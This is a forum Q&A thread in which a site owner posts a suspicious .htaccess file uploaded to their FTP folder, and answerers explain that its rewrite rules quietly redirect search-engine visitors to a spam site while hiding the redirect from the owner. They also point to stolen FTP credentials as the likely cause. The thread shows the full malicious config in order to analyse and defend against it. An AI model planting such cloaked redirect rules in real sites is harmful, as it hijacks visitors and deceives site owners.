Suspicious .htaccess File

security apache-2.2 mod-rewrite .htaccess

This was uploaded to one of my FTP folders. I'm not familiar with Apache, but still curious - can someone tell me what type of dastardly act this file is trying to commit? Thanks!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

Solution 1:

That sends users that come from a search engine to the last site SPAMMER.info (see question history for actual site).

It looks for referrers in an attempt to hide from you, since you likely don't access the site via search engines. That is, if you go to the URL directly, everything seems normal. However, if you come in via a search engine, you get redirected.

Note: this does not affect web crawlers as they (googlebot, at least) don't set the referrer header.

Solution 2:

Any time a user from a search engine any page on your site, they'll be redirected to .info spam site.

It's very sneaky - you won't notice anything is wrong as you'll normally just type the address in.

Solution 3:

to add more - most probably your ftp credentials got leaked. maybe you had them saved in filezilla / total commander etc. there is plenty of malware stealing those and then 'going' around - logging on to ftp accounts, attaching malicious javascript to index.php / html or putting similar rewrite files.

Related

How long should resize2fs take on a 1TB partition?
Should I be using iptables or ufw?
Best way to clone a live linux system
Mandelbrot-like sets for functions other than $f(z)=z^2+c$?
Are cyclic groups always abelian? [closed]
Mathematics understood through poems? [closed]
Why can we multiply by breaking up the factors as sums in different ways?
How are first digits of $\pi$ found?
Probability of drawing the Jack of Hearts? [duplicate]
Accidents of small $n$
Are there any other methods to apply to solving simultaneous equations?
Are Mersenne prime exponents always odd?